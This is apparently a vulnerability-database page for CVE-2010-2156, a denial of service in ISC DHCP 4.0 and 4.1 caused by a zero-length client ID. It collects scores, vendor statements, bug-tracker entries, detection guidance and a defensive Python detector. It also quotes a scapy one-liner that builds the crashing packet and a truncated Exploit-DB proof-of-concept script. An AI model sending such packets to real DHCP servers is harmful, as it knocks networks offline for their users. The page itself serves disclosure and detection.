CVE-2010-2156
Published 2010-06-07
CVE-2010-2156: ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
Priority P3 | 44 | medium | 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 76.41% (99.5th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | isc-dhcp | < isc-dhcp 4.1.1-P1-1 (bookworm) | isc-dhcp 4.1.1-P1-1 (bookworm) |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
Detection & IOCs
Command: DHCP Request with zero-length client_id option: `DHCP(options=[("message-type","request"),("client_id",""),("end")])`
- Detect DHCP Request packets (UDP dst port 67) containing a zero-length client_id option (option 61 with length 0); such packets will crash unpatched ISC DHCP 4.0.x/4.1.x servers.
- Monitor the ISC DHCP server process for abnormal or unexpected exits, which may indicate exploitation of this DoS vulnerability via a crafted zero-length client ID.
- Flag DHCP broadcast traffic sourced from MAC aa:aa:aa:aa:aa:aa as a known exploit indicator from the public PoC.
- Only ISC DHCP versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 are affected; versions shipped with Red Hat Enterprise Linux 3, 4, and 5 are NOT vulnerable.
- The exploit requires the attacker to supply a valid IP address within the DHCP server's subnet range for the ciaddr field; brute-forcing the subnet may be needed to identify a correct value.
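One way to implement the first detection bullet, added here as an example and not taken from any of the sources on this page: it walks the options of a captured UDP port 67 payload and reports option 61 with length 0. The function names and sample payloads are constructed for illustration, and option overload (option 52) is not handled.

```python
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # marks the start of the options field
OPT_PAD, OPT_CLIENT_ID, OPT_END = 0, 61, 255


def parse_dhcp_options(payload):
    """Yield (code, value) for each option in a BOOTP/DHCP UDP payload."""
    # 236-byte fixed BOOTP header, then the 4-byte magic cookie.
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP payload")
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == OPT_PAD:          # pad has no length byte
            i += 1
            continue
        if code == OPT_END:
            return
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        yield code, value
        i += 2 + length


def has_zero_length_client_id(payload):
    """True if option 61 is present with length 0 (RFC 2132 minimum is 2)."""
    return any(code == OPT_CLIENT_ID and not value
               for code, value in parse_dhcp_options(payload))


def sample_payload(options):
    """Constructed input: minimal BOOTREQUEST header plus raw option bytes."""
    header = struct.pack("!BBBB", 1, 1, 6, 0) + b"\x00" * 232
    return header + MAGIC_COOKIE + bytes(options)


# Constructed samples: DHCPREQUEST (option 53 = 3) with and without a valid ID.
SUSPECT = sample_payload([53, 1, 3, 61, 0, 255])
NORMAL = sample_payload([53, 1, 3, 61, 7, 1, 0xDE, 0xAD, 0xBE, 0xEF, 0, 1, 255])

if __name__ == "__main__":
    for name, pkt in (("suspect", SUSPECT), ("normal", NORMAL)):
        print(name, "ALERT" if has_zero_length_client_id(pkt) else "ok")
```

Payloads that raise `ValueError` (bad cookie or truncated options) are worth logging separately, since a malformed options field is itself unusual on a healthy network.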
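CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| osv | — | 5.0 | MEDIUM | — |
| vendor_debian | — | 5.0 | MEDIUM | — |
| vendor_redhat | — | 5.0 | MEDIUM | — |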
Red Hat
dhcp: remote DoS via zero-length client ID
vendor_redhat·2010-06-01·CVSS 5.0
CVE-2010-2156 [MEDIUM] dhcp: remote DoS via zero-length client ID
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
Statement: Not vulnerable. These issues did not affect the versions of dhcp as shipped with Red Hat Enterprise Linux 3, 4, or 5.
Package: dhcp (Red Hat Enterprise Linux 6) - Not affected
Debian
CVE-2010-2156: isc-dhcp - ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to ...
vendor_debian·2010·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156: isc-dhcp - ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to ...
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
Scope: local
bookworm: resolved (fixed in 4.1.1-P1-1)
bullseye: resolved (fixed in 4.1.1-P1-1)
sid: resolved (fixed in 4.1.1-P1-1)
trixie: resolved (fixed in 4.1.1-P1-1)
GHSA
GHSA-rrx5-gxgm-9hrg: ISC DHCP 4
ghsa_unreviewed·2022-05-17
CVE-2010-2156 [MEDIUM] GHSA-rrx5-gxgm-9hrg: ISC DHCP 4
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
OSV
CVE-2010-2156: ISC DHCP 4
osv·2010-06-07·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156: ISC DHCP 4
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
No detection rules found.
Exploit-DB
ISC DHCPD - Denial of Service
exploitdb·2010-07-03
CVE-2010-2156 ISC DHCPD - Denial of Service
---
```python
#!/usr/bin/env python
# Exploit title: isc-dhcpd DoS
# Date: 03/07/2010
# Author: sid
# Software Link: https://www.isc.org/software/dhcp
# Version: 4.0.x, 4.1.x, 4.2.x
# CVE: cve-2010-2156
# ps: is possible make a bruteforce on subnet ip address to find a correct value.
#
import sys
import string
if len(sys.argv) is 1:
    print("Usage: " + sys.argv[0] + "-ip=")
    print("Example: " + sys.argv[0] + " -ip=192.168.1.100")
    sys.exit(0)
for i in range(len(sys.argv)):
    if string.find(sys.argv[i],"-ip") is 0:
        globals()['ip'] = sys.argv[i].split('=')[1]
from scapy.all import *
globals()['verbose'] = 2
def msg(string, level):
    if globals()['verbose'] >= level:
        print(string)
msg("attack...",2)
p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.25
```
Metasploit
ISC DHCP Zero Length ClientID Denial of Service Module
metasploit
This module performs a Denial of Service Attack against the ISC DHCP server, versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request message with a 0-length client_id option for an IP address on the appropriate range for the dhcp server. When ISC DHCP Server tries to hash this value it exits abnormally.
Bugzilla
CVE-2010-2156 dhcp: remote DoS via zero-length client ID [fedora-all]
bugzilla·2010-06-07·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156 dhcp: remote DoS via zero-length client ID [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=601403
Please note: this issue affects multiple sup
Bugzilla
CVE-2010-2156 dhcp: remote DoS via zero-length client ID
bugzilla·2010-06-07·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156 dhcp: remote DoS via zero-length client ID
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-2156 to
the following vulnerability:
Name: CVE-2010-2156
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2156
Assigned: 20100603
Reference: CONFIRM: http://ftp.isc.org/isc/dhcp/dhcp-4.0.2-P1-RELNOTES
Reference: CONFIRM: http://ftp.isc.org/isc/dhcp/dhcp-4.1.1-P1-RELNOTES
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote
attackers to cause a denial of service (server exit) via a zero-length
client ID.
Discussion:
Created attachment 421951
upstream patch to correct the issue
---
Created dhcp tracking bugs for this issue
Affects: fedora-all [bug 601405]
---
dhcp-4.1.1-22.P1.fc13 has been submitted as an update for Fedora 13.
http:/
References
- http://ftp.isc.org/isc/dhcp/dhcp-4.0.2-P1-RELNOTES
- http://ftp.isc.org/isc/dhcp/dhcp-4.1.1-P1-RELNOTES
- http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042843.html
- http://secunia.com/advisories/40116
- http://www.exploit-db.com/exploits/14185
- http://www.mandriva.com/security/advisories?name=MDVSA-2010:114
- http://www.securityfocus.com/bid/40775
- http://www.securitytracker.com/id?1024093
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59222
2010-06-07
Published